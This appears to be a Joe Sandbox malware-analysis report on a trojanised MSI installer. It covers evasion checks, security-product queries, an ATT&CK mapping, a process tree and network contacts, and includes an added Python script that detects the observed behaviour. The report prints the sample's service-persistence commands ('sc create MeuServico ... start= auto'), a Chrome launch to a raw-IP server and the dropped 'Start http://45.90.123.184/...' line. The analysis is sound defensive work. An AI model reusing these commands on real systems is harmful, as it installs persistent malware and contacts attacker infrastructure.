            Source: windows10.exe, 00000020.00000003.1649347613.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1648631286.00000000009DD000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1648687824.00000000009DD000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1649150067.00000000009DD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-VID-AnalyticRJU"+
            Source: windows10.exe, 00000020.00000003.1622019897.000000007FCF0000.00000004.00001000.00020000.00000000.sdmp, windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: stQEMU
            Source: windows10.exe, 00000020.00000003.1649347613.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1649607522.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Analytic
            Source: windows10.exe, 00000020.00000003.1649347613.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Diagnose
            Source: windows10.exe, 00000020.00000003.1622019897.000000007FCF0000.00000004.00001000.00020000.00000000.sdmp, windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: 6without Hyper-V for Windows Essential Server Solutions
            Source: windows10.exe, 00000020.00000002.2679332883.0000000004D3A000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: +Microsoft-Windows-Hyper-V-NETVSC/Diagnostic`
            Source: windows10.exe, 00000020.00000002.2679332883.0000000004D24000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: &Microsoft-Windows-Hyper-V-VID-Analytic
            Source: windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/OperationalLMEMh
            Source: windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-AnalyticLMEM`
            Source: windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/DebugLMEM`
            Source: windows10.exe, 00000020.00000002.2679332883.0000000004C7B000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: 0Microsoft-Windows-Hyper-V-Guest-Drivers/Analytic
            Source: windows10.exe, 00000020.00000002.2679332883.0000000004CCD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: -Microsoft-Windows-Hyper-V-Guest-Drivers/Debug
            Source: windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: VMWare
            Source: windows10.exe, 00000020.00000003.1649347613.00000000009DA000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Guest-Drivers/Operational
            Source: windows10.exe, 00000020.00000003.1622019897.000000007FCF0000.00000004.00001000.00020000.00000000.sdmp, windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: Standard without Hyper-V Core
            Source: hBqTrQLya4.msi | Binary or memory string: MvmCiy
            Source: windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-VID-AdminLMEMH
            Source: windows10.exe, 00000020.00000003.1649347613.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1649607522.00000000009E3000.00000004.00000020.00020000.00000000.sdmp, windows10.exe, 00000020.00000003.1648221309.00000000009A1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Microsoft-Windows-Hyper-V-Hypervisor-Admin8"
            Source: C:\Windows\System32\msiexec.exe | Process information queried: ProcessInformation
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Code function: 14_2_010B5E5A rdtsc
            Source: C:\Windows\Installer\MSIDD62.tmp | Code function: 12_2_0040C3B6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Windows\Installer\MSIDD62.tmp | Code function: 12_2_004203E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Installer\MSIDD62.tmp | Code function: 12_2_0041843F mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Installer\MSIDD92.tmp | Code function: 13_2_00DB03E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\Installer\MSIDD92.tmp | Code function: 13_2_00DA843F mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\Installer\MSIDD62.tmp | Code function: 12_2_003E2510 GetProcessHeap
            Source: C:\Windows\System32\msiexec.exe | Process created: C:\Windows\Installer\MSIDD62.tmp "C:\Windows\Installer\MSIDD62.tmp" /DontWait /HideWindow "C:\Users\user\Documents\Windows10.cmd" C:\Users\user\Documents\
            Source: C:\Windows\Installer\MSIDD62.tmp | Code function: 12_2_0040C3B6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Windows\Installer\MSIDD62.tmp | Code function: 12_2_004083BD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Windows\Installer\MSIDD62.tmp | Code function: 12_2_00408553 SetUnhandledExceptionFilter
            Source: C:\Windows\Installer\MSIDD62.tmp | Code function: 12_2_00407B9C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Windows\Installer\MSIDD92.tmp | Code function: 13_2_00D983BD IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Windows\Installer\MSIDD92.tmp | Code function: 13_2_00D9C3B6 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
            Source: C:\Windows\Installer\MSIDD92.tmp | Code function: 13_2_00D98553 SetUnhandledExceptionFilter
            Source: C:\Windows\Installer\MSIDD92.tmp | Code function: 13_2_00D97B9C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
            Source: C:\Windows\Installer\MSIDD62.tmp | Code function: 12_2_003E7660 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,Sleep,EnumWindows,BringWindowToTop,WaitForSingleObject,GetExitCodeProcess,GetWindowThreadProcessId,GetWindowLongW
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= auto
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start MeuServico
            Source: C:\Windows\System32\cmd.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://45.90.123.184/clientes/inspecionando.php
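The three process-creation lines above form a compact persistence chain: cmd.exe registers a service (MeuServico) whose binary lives under the user's Pictures folder with start= auto, starts it immediately, and opens Chrome on a URL that addresses the server by raw IP. The Python below is an added example written for this page, not code from the report or from Joe Sandbox. It runs over hand-constructed process-creation records modelled on those lines (parent image, child image, command line; the sandbox's own event format is not assumed), parses sc.exe's `option= value` argument convention, correlates the create and start calls by service name, and flags the three behaviours. The user-writable path prefixes, the browser and script-host lists, the rule names and the benign control record are the example's own choices.

```python
import re

# Constructed process-creation records modelled on the "Process created" lines in
# this report (parent image, child image, child command line). Hand-written sample
# input for the example, not events exported from the sandbox.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\sc.exe",
     "cmdline": r'sc create MeuServico binPath= "C:\Users\user\Pictures\fotosdaviagem\windows10.exe" start= auto'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\sc.exe",
     "cmdline": r"sc start MeuServico"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmdline": r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://45.90.123.184/clientes/inspecionando.php'},
    # Benign control (constructed): an installer registering an on-demand service under Program Files.
    {"parent": r"C:\Windows\System32\msiexec.exe",
     "image": r"C:\Windows\System32\sc.exe",
     "cmdline": r'sc create VendorUpdater binPath= "C:\Program Files\Vendor\updater.exe" start= demand'},
]

# Locations an unprivileged user can write to; a service binary under one of them is
# the example's primary indicator (assumed list, extend it for your environment).
USER_WRITABLE_PREFIXES = ("c:\\users\\", "%userprofile%", "%appdata%", "%localappdata%",
                          "%temp%", "%tmp%", "%public%")
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "iexplore.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
RAW_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}\S*")


def basename(path):
    """Last path component, lower-cased, so image names compare regardless of directory."""
    return path.rsplit("\\", 1)[-1].lower()


def split_windows_cmdline(cmdline):
    """Tokenize a Windows command line: whitespace separates tokens, double quotes group
    a token, so quoted paths containing spaces survive as a single token."""
    tokens, cur, in_quotes = [], [], False
    for ch in cmdline:
        if ch == '"':
            in_quotes = not in_quotes
        elif ch.isspace() and not in_quotes:
            if cur:
                tokens.append("".join(cur))
                cur = []
        else:
            cur.append(ch)
    if cur:
        tokens.append("".join(cur))
    return tokens


def parse_sc(cmdline):
    """Parse an sc.exe command line into (verb, service_name, options).
    sc writes options as 'name= value': the '=' belongs to the option token and the
    value is the *next* token, which is why a plain key=value split misses binPath."""
    tokens = split_windows_cmdline(cmdline)
    if len(tokens) < 3 or basename(tokens[0]) not in ("sc", "sc.exe"):
        return None
    verb, service = tokens[1].lower(), tokens[2]
    options, rest, i = {}, tokens[3:], 0
    while i < len(rest):
        if rest[i].endswith("=") and i + 1 < len(rest):
            options[rest[i][:-1].lower()] = rest[i + 1]
            i += 2
        else:
            i += 1
    return verb, service, options


def is_user_writable(path):
    return path.strip().lower().startswith(USER_WRITABLE_PREFIXES)


def analyse(events):
    """Apply the three rules to process-creation records and return findings in event
    order. Service create/start events are correlated by service name."""
    findings, created = [], {}
    for ev in events:
        image, parent = basename(ev["image"]), basename(ev["parent"])
        if image == "sc.exe":
            parsed = parse_sc(ev["cmdline"])
            if parsed is None:
                continue
            verb, service, opts = parsed
            if verb == "create":
                binpath = opts.get("binpath", "")
                created[service.lower()] = binpath
                if is_user_writable(binpath):
                    findings.append({"rule": "service_binpath_in_user_writable_path",
                                     "service": service, "binpath": binpath,
                                     "start": opts.get("start", "demand").lower(), "parent": parent})
            elif verb == "start" and service.lower() in created:
                findings.append({"rule": "service_started_right_after_creation",
                                 "service": service, "binpath": created[service.lower()], "parent": parent})
        elif image in BROWSERS and parent in SCRIPT_HOSTS:
            m = RAW_IP_URL.search(ev["cmdline"])
            if m:
                findings.append({"rule": "browser_launched_by_script_host_to_raw_ip_url",
                                 "parent": parent, "url": m.group(0)})
    return findings


if __name__ == "__main__":
    for finding in analyse(SAMPLE_EVENTS):
        print(finding)
```

Run against the constructed records, the first three events each produce one finding and the Program Files control produces none. The tokenizer matters more than it looks: sc.exe's value is a separate token after `binPath=`, and the path is quoted because it may contain spaces, so a naive split on `=` or on whitespace yields either an empty value or a truncated path. The same logic applies unchanged to the CommandLine field of Sysmon Event ID 1 or Security event 4688 once those records are mapped to the parent/image/cmdline shape used here.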
            Source: windows10.exe, 00000020.00000002.2679332883.0000000004D16000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: PROGRAM MANAGER
            Source: C:\Windows\Installer\MSIDD62.tmp | Code function: 12_2_0040801C cpuid
            Source: C:\Windows\Installer\MSIDD62.tmp | Code function: GetLocaleInfoEx,FormatMessageA (12_2_003F2161)
            Source: C:\Windows\Installer\MSIDD62.tmp | Code function: GetLocaleInfoEx (12_2_004071C1)
            Source: C:\Windows\Installer\MSIDD62.tmp | Code function: GetACP,IsValidCodePage,GetLocaleInfoW (12_2_00423414)
            Source: C:\Windows\Installer\MSIDD62.tmp | Code function: EnumSystemLocalesW (12_2_004236B6)
            Source: C:\Windows\Installer\MSIDD62.tmp | Code function: EnumSystemLocalesW (12_2_00423701)
            Source: C:\Windows\Installer\MSIDD62.tmp | Code function: EnumSystemLocalesW (12_2_0042379C)
            Source: C:\Windows\Installer\MSIDD62.tmp | Code function: EnumSystemLocalesW (12_2_0041C7A2)
            Source: C:\Windows\Installer\MSIDD62.tmp | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW (12_2_00423827)
            Source: C:\Windows\Installer\MSIDD62.tmp | Code function: GetLocaleInfoW (12_2_00423A7A)
            Source: C:\Windows\Installer\MSIDD62.tmp | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP (12_2_00423BA3)
            Source: C:\Windows\Installer\MSIDD62.tmp | Code function: GetLocaleInfoW (12_2_00423CA9)
            Source: C:\Windows\Installer\MSIDD62.tmp | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW (12_2_00423D78)
            Source: C:\Windows\Installer\MSIDD62.tmp | Code function: GetLocaleInfoW (12_2_0041CD1F)
            Source: C:\Windows\Installer\MSIDD92.tmp | Code function: GetLocaleInfoEx (13_2_00D971C1)
            Source: C:\Windows\Installer\MSIDD92.tmp | Code function: GetLocaleInfoEx,FormatMessageA (13_2_00D82161)
            Source: C:\Windows\Installer\MSIDD92.tmp | Code function: GetACP,IsValidCodePage,GetLocaleInfoW (13_2_00DB3414)
            Source: C:\Windows\Installer\MSIDD92.tmp | Code function: EnumSystemLocalesW (13_2_00DB36B6)
            Source: C:\Windows\Installer\MSIDD92.tmp | Code function: EnumSystemLocalesW (13_2_00DB379C)
            Source: C:\Windows\Installer\MSIDD92.tmp | Code function: EnumSystemLocalesW (13_2_00DAC7A2)
            Source: C:\Windows\Installer\MSIDD92.tmp | Code function: EnumSystemLocalesW (13_2_00DB3701)
            Source: C:\Windows\Installer\MSIDD92.tmp | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW (13_2_00DB3827)
            Source: C:\Windows\Installer\MSIDD92.tmp | Code function: GetLocaleInfoW (13_2_00DB3A7A)
            Source: C:\Windows\Installer\MSIDD92.tmp | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP (13_2_00DB3BA3)
            Source: C:\Windows\Installer\MSIDD92.tmp | Code function: GetLocaleInfoW (13_2_00DB3CA9)
            Source: C:\Windows\Installer\MSIDD92.tmp | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW (13_2_00DB3D78)
            Source: C:\Windows\Installer\MSIDD92.tmp | Code function: GetLocaleInfoW (13_2_00DACD1F)
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
            Source: C:\Windows\System32\msiexec.exe | Queries volume information: C:\ VolumeInformation (observed 2 times)
            Source: C:\Windows\Installer\MSIDD62.tmp | Code function: 12_2_00408615 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
            Source: C:\Windows\Installer\MSIDD62.tmp | Code function: 12_2_0041D192 GetTimeZoneInformation
            Source: windows10.exe, 00000020.00000002.2500690290.0000000000947000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter : FirewallProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiSpywareProduct
            Source: C:\Users\user\Pictures\fotosdaviagem\windows10.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : FirewallProduct
            MITRE ATT&CK matrix. Numbers in parentheses are the counts the report attaches to the techniques its signatures matched; cells without a number are the remaining techniques of the matrix, not matched for this sample.

            | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
            |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
            | Gather Victim Identity Information | Acquire Infrastructure | Replication Through Removable Media (1) | Windows Management Instrumentation (31) | DLL Side-Loading (1) | Exploitation for Privilege Escalation (1) | Disable or Modify Tools (1) | Credential API Hooking (1) | System Time Discovery (2) | Remote Services | Archive Collected Data (1) | Ingress Tool Transfer (3) | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
            | Credentials | Domains | Default Accounts | Native API (1) | Windows Service (1) | DLL Side-Loading (1) | Deobfuscate/Decode Files or Information (1) | LSASS Memory | Peripheral Device Discovery (11) | Remote Desktop Protocol | Credential API Hooking (1) | Encrypted Channel (11) | Exfiltration Over Bluetooth | Network Denial of Service |
            | Email Addresses | DNS Server | Domain Accounts | Command and Scripting Interpreter (2) | Registry Run Keys / Startup Folder (11) | Windows Service (1) | Obfuscated Files or Information (2) | Security Account Manager | File and Directory Discovery (2) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (3) | Automated Exfiltration | Data Encrypted for Impact |
            | Employee Names | Virtual Private Server | Local Accounts | Service Execution (1) | Login Hook | Process Injection (12) | DLL Side-Loading (1) | NTDS | System Information Discovery (165) | Distributed Component Object Model | Input Capture | Application Layer Protocol (4) | Traffic Duplication | Data Destruction |
            | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Registry Run Keys / Startup Folder (11) | File Deletion (1) | LSA Secrets | Security Software Discovery (281) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
            | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | Masquerading (121) | Cached Domain Credentials | Virtualization/Sandbox Evasion (3) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
            | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Virtualization/Sandbox Evasion (3) | DCSync | Process Discovery (3) | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
            | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Process Injection (12) | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            Behavior Graph ID: 1467456 | Sample: hBqTrQLya4.msi | Start date: 04/07/2024 | Architecture: WINDOWS | Score: 84

            Signatures attached to the sample node: Multi AV Scanner detection for domain / URL; Multi AV Scanner detection for dropped file; Multi AV Scanner detection for submitted file; 2 other signatures.

            Process tree as drawn in the graph (indentation shows parent/child; bracketed numbers are the per-process counters from the legend above; "->" marks a network endpoint contacted by that process):

            hBqTrQLya4.msi (start)
              msiexec.exe [51, 54]
                dropped: C:\Windows\Installer\MSIDD92.tmp (PE32), C:\Windows\Installer\MSIDD62.tmp (PE32), C:\Windows\Installer\MSID7D3.tmp (PE32), 6 other malicious files
                signature: Drops executables to the windows directory (C:\Windows) and starts them
                windows10.exe
                  signatures: Overwrites code with unconditional jumps - possibly settings hooks in foreign process; Switches to a custom stack to bypass stack traces
                  windows10.exe
                    signature: Overwrites code with unconditional jumps - possibly settings hooks in foreign process
                    windows10.exe
                      signature: Overwrites code with unconditional jumps - possibly settings hooks in foreign process
                  windows10.exe
                  windows10.exe
                  2 other processes
                msiexec.exe
                MSIDD62.tmp
                MSIDD92.tmp
              cmd.exe [13]
                chrome.exe
                  -> 192.168.2.7, ports 123, 138, 443 (unknown, unknown)
                  -> 239.255.255.250 (unknown, Reserved)
                  chrome.exe
                    -> www.google.com 142.250.186.132, ports 443, 49712, 49723 (GOOGLEUS, United States)
                    -> 45.90.123.184, ports 49702, 49703, 80 (DEDIPATH-LLCUS, Germany)
                conhost.exe
              cmd.exe [1]
                conhost.exe
                sc.exe [1]
                sc.exe [1]
              msiexec.exe [3]

Antivirus detection

Initial sample:
Source         | Detection | Scanner       | Label
hBqTrQLya4.msi | 32%       | ReversingLabs | Win32.Trojan.Generic
hBqTrQLya4.msi | 7%        | Virustotal    |

Dropped files:
Source                                             | Detection | Scanner
C:\Users\user\Pictures\fotosdaviagem\StarBurn.dll  | 50%       | ReversingLabs
C:\Users\user\Pictures\fotosdaviagem\StarBurn.dll  | 43%       | Virustotal
C:\Users\user\Pictures\fotosdaviagem\windows10.exe | 3%        | ReversingLabs
C:\Users\user\Pictures\fotosdaviagem\windows10.exe | 5%        | Virustotal
C:\Windows\Installer\MSID686.tmp                   | 0%        | ReversingLabs
C:\Windows\Installer\MSID686.tmp                   | 1%        | Virustotal
C:\Windows\Installer\MSID6F5.tmp                   | 0%        | ReversingLabs
C:\Windows\Installer\MSID6F5.tmp                   | 1%        | Virustotal
C:\Windows\Installer\MSID754.tmp                   | 0%        | ReversingLabs
C:\Windows\Installer\MSID754.tmp                   | 1%        | Virustotal
C:\Windows\Installer\MSID783.tmp                   | 0%        | ReversingLabs
C:\Windows\Installer\MSID783.tmp                   | 1%        | Virustotal
C:\Windows\Installer\MSID7D3.tmp                   | 0%        | ReversingLabs
C:\Windows\Installer\MSID7D3.tmp                   | 1%        | Virustotal
C:\Windows\Installer\MSIDD62.tmp                   | 0%        | ReversingLabs
C:\Windows\Installer\MSIDD62.tmp                   | 0%        | Virustotal
C:\Windows\Installer\MSIDD92.tmp                   | 0%        | ReversingLabs
C:\Windows\Installer\MSIDD92.tmp                   | 0%        | Virustotal

Unpacked PE files:
No Antivirus matches
Domains:
Source         | Detection | Scanner
www.google.com | 0%        | Virustotal

URLs:
Source                            | Detection | Scanner
http://45.90.123.184/favicon.ico  | 0%        | Avira URL Cloud (safe)
http://45.90.123.184/favicon.ico  | 8%        | Virustotal
http://www.audio-tool.net         | 0%        | Avira URL Cloud (safe)
http://www.audio-tool.net         | 5%        | Virustotal
http://ip-api.com/json/           | 0%        | Avira URL Cloud (safe)
http://ip-api.com/json/           | 0%        | Virustotal
https://pastebin.com/raw/tBXs1wCj | 0%        | Avira URL Cloud (safe)
https://pastebin.com/raw/tBXs1wCj | 1%        | Virustotal
http://www.indyproject.org/       | 0%        | Avira URL Cloud (safe)
http://www.indyproject.org/       | 0%        | Virustotal
Contacted domains
Name           | IP              | Active | Malicious | Antivirus Detection | Reputation
www.google.com | 142.250.186.132 | true   | false     |                     | unknown

Contacted URLs
Name                                            | Malicious | Antivirus Detection                  | Reputation
http://45.90.123.184/favicon.ico                | false     | 8% Virustotal; Avira URL Cloud: safe | unknown
http://45.90.123.184/clientes/inspecionando.php | false     |                                      | unknown

URLs from memory and binary data
Name | Source | Malicious | Antivirus Detection | Reputation
https://pastebin.com/raw/tBXs1wCj | windows10.exe, 00000020.00000002.2679332883.0000000004D48000.00000004.00001000.00020000.00000000.sdmp | false | 1% Virustotal; Avira URL Cloud: safe | unknown
http://www.audio-tool.net | windows10.exe, 0000000E.00000000.1282464047.0000000000497000.00000002.00000001.01000000.00000006.sdmp | false | 5% Virustotal; Avira URL Cloud: safe | unknown
http://www.indyproject.org/ | windows10.exe, 00000020.00000003.1624320924.000000007F8AE000.00000004.00001000.00020000.00000000.sdmp; windows10.exe, 00000020.00000002.2679332883.0000000004C6C000.00000004.00001000.00020000.00000000.sdmp; windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown
http://ip-api.com/json/ | windows10.exe, 00000020.00000003.1624320924.000000007F8AE000.00000004.00001000.00020000.00000000.sdmp; windows10.exe, 00000020.00000002.2659394970.0000000003E40000.00000040.00001000.00020000.00000000.sdmp | false | 0% Virustotal; Avira URL Cloud: safe | unknown

Only the two 45.90.123.184 URLs were observed on the wire during the run; the others were recovered from windows10.exe memory. The Malicious column is a reputation verdict on the URL itself, not a statement about the observed behaviour: 45.90.123.184 is still the only non-Google external host this sample reaches, and the dropped one-line file `Start http://45.90.123.184/clientes/inspecionando.php` listed below shows the visit is deliberate. http://www.indyproject.org/ is the home page of the Indy networking components compiled into Delphi programs and is a library string rather than a destination. http://ip-api.com/json/ is a public IP-geolocation endpoint and https://pastebin.com/raw/tBXs1wCj a raw paste; both are commonly used by downloaders to fetch location and configuration, but the report records no connection to either within the analysis window.
Contacted public IPs
IP              | Domain         | Country       | ASN   | ASN Name       | Malicious
239.255.255.250 | unknown        | Reserved      |       | unknown        | false
142.250.186.132 | www.google.com | United States | 15169 | GOOGLEUS       | false
45.90.123.184   | unknown        | Germany       | 35913 | DEDIPATH-LLCUS | false

Private IPs
192.168.2.7
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1467456
              Start date and time:2024-07-04 09:12:15 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 9m 45s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:37
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:hBqTrQLya4.msi
              renamed because original name is a hash value
              Original Sample Name:29772a95fb3ed50319dc74f8be52963ee621dc151ccd94b10ea14a7123c268f7.msi
              Detection:MAL
              Classification:mal84.evad.winMSI@44/35@2/4
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 82%
              • Number of executed functions: 54
              • Number of non-executed functions: 310
              Cookbook Comments:
              • Found application associated with file extension: .msi
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, MoUsoCoreWorker.exe, conhost.exe, svchost.exe
              • Excluded IPs from analysis (whitelisted): 142.250.185.67, 142.250.185.110, 108.177.15.84, 34.104.35.123, 87.248.205.0, 216.58.206.35, 87.248.204.0
              • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, ctldl.windowsupdate.com, clientservices.googleapis.com, time.windows.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; report is missing behavior information
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              No simulations
Context: IPs

Match 239.255.255.250:
Associated Sample Name / URL | Detection | Threat Name
https://worldofprocure.com/worldofprocure.rar | malicious | Unknown
https://www.qcc.com/web/cms/overseaApply?opsriskcountry=%E7%BE%8E%E5%9B%BD&ip=155.190.35.6&back=%2Fweblogin%3Fback%3D%2Ffirm%2F1ef8635d382a741aaca689243a486673.html | malicious | Unknown
file.exe | malicious | Unknown
https://m.exactag.com/ai.aspx?tc=d9177038bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253Atheannapolis250.org%2Fwinner%2F14136%2F%2FYnJhbndlbGwubW9mZmF0QGtwcy5jb20= | malicious | Unknown
https://we.tl/t-dQx6fJKslT | malicious | Unknown
http://sites.google.com/view/terramininghseq/inductions/binduli-and-goldfields-induction | malicious | Unknown
file.exe | malicious | Amadey, Mars Stealer, Stealc, Vidar
https://ddec1-0-en-ctp.trendmicro.com/wis/clicktime/v1/query?url=https%3a%2f%2fyourremittance.com.au%2ft%2fs%2fUD5xw4r&umid=cc04381d-8482-4529-83d6-e97329962ac3&auth=3a5566c60b1f4d8525fa8ab109f94675a663eb25-bbc82991079aa7c5d0d2ec918ad27ef8f965c70a | malicious | Unknown
file.exe | malicious | Unknown
https://cdn.polyfill.io/ | malicious | Unknown

Match 45.90.123.184:
